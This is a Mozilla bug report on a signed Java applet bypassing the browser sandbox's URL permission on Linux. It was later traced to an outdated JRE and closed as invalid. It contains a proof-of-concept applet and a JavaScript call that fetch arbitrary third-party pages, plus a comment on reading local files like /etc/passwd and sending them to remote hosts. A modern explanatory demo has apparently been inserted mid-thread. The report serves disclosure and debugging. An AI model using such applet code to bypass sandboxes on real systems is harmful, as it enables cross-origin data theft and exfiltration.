Java applets bypass sandbox URL permission

Status: RESOLVED INVALID

Product: Core Graveyard
Component: Java-Implemented Plugins
Priority: --
Severity: critical
Reported: 14 years ago
Modified: 6 years ago

People

(Reporter: Ivano Picco, Assigned: Blake Ross)

Tracking

Version: Trunk
Hardware: Other
OS: Linux

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: announced JRE vulnerability in 1.4.2_05)

(Reporter)

Description

14 years ago
User-Agent:       Mozilla/5.0 (compatible; Konqueror/3.2; Linux) (KHTML, like Gecko)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040803 Firefox/0.9.3

It is possible to bypass the Java sandbox's protection on URL permission using a
signed Java applet, especially with the URLConnection.openConnection method.
This bug could be used to load web pages or files from third-party sites without
specific permission, and a specific applet can act like an unsecured
XMLHttpRequest.
Also (not tested yet) you can send confidential data to a remote host using a
simple signed applet with an approach similar to the one explained below.

This bug also appears in Firefox 0.9.1 and on the latest trunk build, only in the
Linux version.
 

Reproducible: Always
Steps to Reproduce:
1. Java enabled
2. Try to load a remote signed Java applet containing these lines:
String ln;
String tempString = null;
String theResponse;

// A host the applet was not loaded from (the original read "www.google.com"
// without a scheme, which java.net.URL rejects).
URL imsURL = new URL("http://www.google.com/");

URLConnection connection = imsURL.openConnection();
connection.setDoInput(true);
BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
while ((ln = in.readLine()) != null) {
    //showStatus(ln);
    if (tempString == null) {
        tempString = ln;
    } else {
        tempString = tempString + ln;
    }
}
in.close();

theResponse = tempString.trim();
System.out.println(theResponse);
 
Actual Results:
You can see the Google homepage.

Expected Results:
Throw a security exception, like the Firefox Windows version and all the
Mozilla builds do, without the user explicitly giving permission using the Java policy.

Here is a working example:
 
import java.applet.Applet;
import java.net.*;
import java.io.*;
import java.security.*;

// Signed applet. postXML(url) is called from JavaScript (see below) and
// fetches an arbitrary URL from inside an AccessController.doPrivileged block.
public class jpost extends Applet {
    String ln;
    String tempString = null;
    String UrlEr;

    public void init() {
    }

    public String postXML(String theURL) {
        UrlEr = theURL;
        // The applet's own context. Passing it to doPrivileged intersects the
        // privileged action with it, so it cannot add any permission the applet
        // does not already hold.
        AccessControlContext acc = AccessController.getContext();

        String Resp = (String) AccessController.doPrivileged(
            new PrivilegedAction() {   // raw type: Java 1.4 has no generics
                public Object run() {
                    String theResponse = "Did work";
                    // Reset the accumulator; the response is prefixed with the URL.
                    tempString = UrlEr;
                    // Left commented out by the reporter:
                    //SocketPermission p1 = new SocketPermission("*.net", "connect,accept,resolve");
                    //p2 = new SocketPermission("", "connect,accept");
                    //p3 = new SocketPermission("", "connect,accept");
                    try {
                        URL imsURL = new URL(UrlEr);
                        // Expected behaviour (see above): a SecurityException here for
                        // any host other than the applet's codebase.
                        URLConnection connection = imsURL.openConnection();
                        connection.setDoInput(true);
                        BufferedReader in = new BufferedReader(
                            new InputStreamReader(connection.getInputStream()));
                        while ((ln = in.readLine()) != null) {
                            //showStatus(ln);
                            if (tempString == null) {
                                tempString = ln;
                            } else {
                                tempString = tempString + ln;
                            }
                        }
                        theResponse = tempString.trim();
                        in.close();
                    } catch (MalformedURLException mue) {
                        showStatus("Illegal URL: " + mue);
                        theResponse = "Illegal URL: " + mue;
                    } catch (IOException ioe) {
                        showStatus("IOException: " + ioe);
                        theResponse = "IOException: " + ioe;
                    } catch (Exception e) {
                        // A SecurityException thrown by the sandbox ends up here.
                        showStatus("Error: " + e);
                        theResponse = "Error: " + e;
                    }
                    return (theResponse);
                }
            }, acc);  // End privileged section

        return (Resp);
    }

    public String setText(String s) {
        String text = "working";
        return (text);
    }
}
 
If you use this in a web page with JavaScript like this:
resp = document.applets["jpost"].postXML("http://www.google.com/");

you can load the Google web page.

My JRE is: Java(TM) 2 Runtime Environment, Standard Edition (build
Blackdown-1.4.1-01)
Java HotSpot(TM) Client VM (build Blackdown-1.4.1-01, mixed mode)
My Linux box: Fedora Core 2, Linux pc32119 2.6.6-1.435.2.3custom #1 Fri Jul 23
12:03:47 CEST 2004 i686 athlon i386 GNU/Linux with KDE 3.2.3
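The decision the report expects from the sandbox can be modelled outside a browser. When an applet calls URLConnection.openConnection()/getInputStream() on an http URL, the JRE's HTTP client opens a socket, and that goes through SecurityManager.checkConnect(host, port), which is a check of SocketPermission(host + ":" + port, "connect") against every ProtectionDomain on the call stack, intersected with any AccessControlContext handed to doPrivileged. The applet below is an added example, not code from the bug or from Mozilla: it builds the sandbox context a correctly behaving JRE gives an applet served from a made-up codebase (applets.example.net), grants that domain nothing but "connect" to its own host, and asks the same question twice, once directly and once from inside AccessController.doPrivileged(action, acc) with acc being the applet's own context, the pattern used in the reporter's jpost applet. The demo grants its own class all permissions through a permissive Policy, so that the only domain restricting the check is the constructed applet domain, which is the situation of real applet code, whose every frame belongs to the applet domain. It assumes a JDK in which the AccessController/Policy machinery is still operational (8 through 17); it is not meant for JDK 24 and later, where the security manager was permanently disabled.

```java
import java.net.MalformedURLException;
import java.net.SocketPermission;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AccessControlException;
import java.security.AccessController;
import java.security.CodeSource;
import java.security.Permission;
import java.security.Permissions;
import java.security.Policy;
import java.security.PrivilegedAction;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/*
 * Models the sandbox decision behind SecurityManager.checkConnect(host, port):
 * a SocketPermission check against every ProtectionDomain on the stack plus the
 * AccessControlContext passed to doPrivileged. Host names are made up.
 */
public class AppletSandboxCheck {

    static {
        // Grant everything to this demo's own (dynamic) domain, so the only
        // restriction in play is the constructed applet domain below.
        Policy.setPolicy(new Policy() {
            @Override
            public boolean implies(ProtectionDomain domain, Permission permission) {
                return true;
            }
        });
    }

    /** Default sandbox grant for an applet: connect back to its codebase host only.
     *  The 2-arg ProtectionDomain constructor makes the permissions static, so the
     *  Policy installed above is not consulted for this domain. */
    static AccessControlContext appletContext(String codebaseHost) {
        Permissions granted = new Permissions();
        granted.add(new SocketPermission(codebaseHost, "connect,resolve"));
        CodeSource codebase;
        try {
            codebase = new CodeSource(new URL("http://" + codebaseHost + "/"), (Certificate[]) null);
        } catch (MalformedURLException e) {
            throw new IllegalArgumentException(codebaseHost, e);
        }
        ProtectionDomain appletDomain = new ProtectionDomain(codebase, granted);
        return new AccessControlContext(new ProtectionDomain[] { appletDomain });
    }

    /** What checkConnect(host, port) answers for this applet context. */
    static boolean mayConnect(AccessControlContext applet, String host, int port) {
        try {
            applet.checkPermission(new SocketPermission(host + ":" + port, "connect"));
            return true;
        } catch (AccessControlException denied) {
            return false;
        }
    }

    /** The jpost pattern: the same check issued inside doPrivileged(action, acc)
     *  with acc = the applet's own context. doPrivileged discards the callers
     *  below it; the frames above it and the acc passed in are intersected, so
     *  no permission the applet domain lacks can appear. */
    static boolean mayConnectViaDoPrivileged(AccessControlContext applet,
                                             final String host, final int port) {
        return AccessController.doPrivileged(new PrivilegedAction<Boolean>() {
            public Boolean run() {
                try {
                    AccessController.checkPermission(
                            new SocketPermission(host + ":" + port, "connect"));
                    return Boolean.TRUE;
                } catch (AccessControlException denied) {
                    return Boolean.FALSE;
                }
            }
        }, applet);
    }

    public static void main(String[] args) {
        AccessControlContext applet = appletContext("applets.example.net");
        String[] hosts = { "applets.example.net", "www.google.com", "ftp.example.org" };
        int[] ports = { 80, 80, 21 };
        for (int i = 0; i < hosts.length; i++) {
            System.out.printf("%-22s:%-3d direct=%-5b doPrivileged=%-5b%n",
                    hosts[i], ports[i],
                    mayConnect(applet, hosts[i], ports[i]),
                    mayConnectViaDoPrivileged(applet, hosts[i], ports[i]));
        }
    }
}
```

On a JRE whose sandbox works, both functions return true only for the codebase host and false for www.google.com and ftp.example.org, whichever route the check takes; a JRE that returns true for the foreign hosts is the defect this bug was eventually attributed to. SocketPermission may try to resolve the host names while comparing them and falls back to comparing the names as strings when resolution fails, so the demo runs offline. Writing to the connection (setDoOutput, the reading/writing tutorial mentioned in comment 4) opens the same socket and is governed by the same checkConnect decision, so the exfiltration path described there stands or falls with this single check.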
Comment 1

Do you have this example loaded on a web page somewhere, or could you attach the
compiled class to the bug? Would make things easier.

So Mozilla on Linux doesn't have this problem, only Firefox on Linux? The
linux-only part doesn't bother me if there's some bug in the JRE port, but I
thought Mozilla and Firefox shared all the same Java glue code. I'd really like
to blame this on Java, but if Mozilla works and Firefox doesn't...

Kyle, any ideas?
Whiteboard: [sg:fix]
(Reporter)

Comment 2

14 years ago
Hi! Sorry, but I spent my last two weeks on holiday.
About your questions:
- No, I don't have a web page somewhere, and I can't send you the compiled class
because it's on my computer at the office. Maybe I will send it to you on Monday.
- Yes, only Firefox on Linux. Mozilla doesn't have this problem.

Bye,
Ivano Picco
(Reporter)

Comment 3

14 years ago
OK, I made a simple web page with a working example of the bug.
This is the link:

http://www.mandrile-melis.it/aqupi-temp/java-bug/

It works: it loads the Google homepage (without images) and a local web page.
(Reporter)

Comment 4

14 years ago
Tested with Mozilla 1.7.2, Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.2)
Gecko/20040803. This version HAS THE BUG TOO (is it a Gecko issue??). I learned
much more about the URLConnection methods, and I found that it is possible to make
an output connection with the same code I gave in the example above. See this link:
http://www.ictp.trieste.it/~manuals/programming/Java/tutorial/networking/urls/readingWriting.html
With this you can get any local file (/etc/passwd???) (because the applet is
signed, it is possible to get access to local files; that is correct behaviour)
and send it to any remote host (through the bug) different from the one the applet
is loaded from (also ftp).
 
Severity: normal → critical
(Reporter)

Comment 5

13 years ago
Also tested in Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a4) Gecko/20040927;
the bug is still here..... Could you please confirm this bug?
Component: General → Java-Implemented Plugins
Product: Firefox → Browser
Version: unspecified → Trunk
Comment 6

Are you sure this isn't a JRE bug? Several sandbox vulnerabilities have been
announced since your rather old version. Get 1.4.2_06 at least.
(Reporter)

Comment 7

13 years ago
OK, it's true. I tried with: java version "1.5.0_01"
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_01-b08)
Java HotSpot(TM) Client VM (build 1.5.0_01-b08, mixed mode, sharing)
Thanks for your help.

Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → INVALID
Group: security
Whiteboard: [sg:fix] → announced JRE vulnerability in 1.4.2_05
Component: Java-Implemented Plugins → Java-Implemented Plugins
Product: Core → Core Graveyard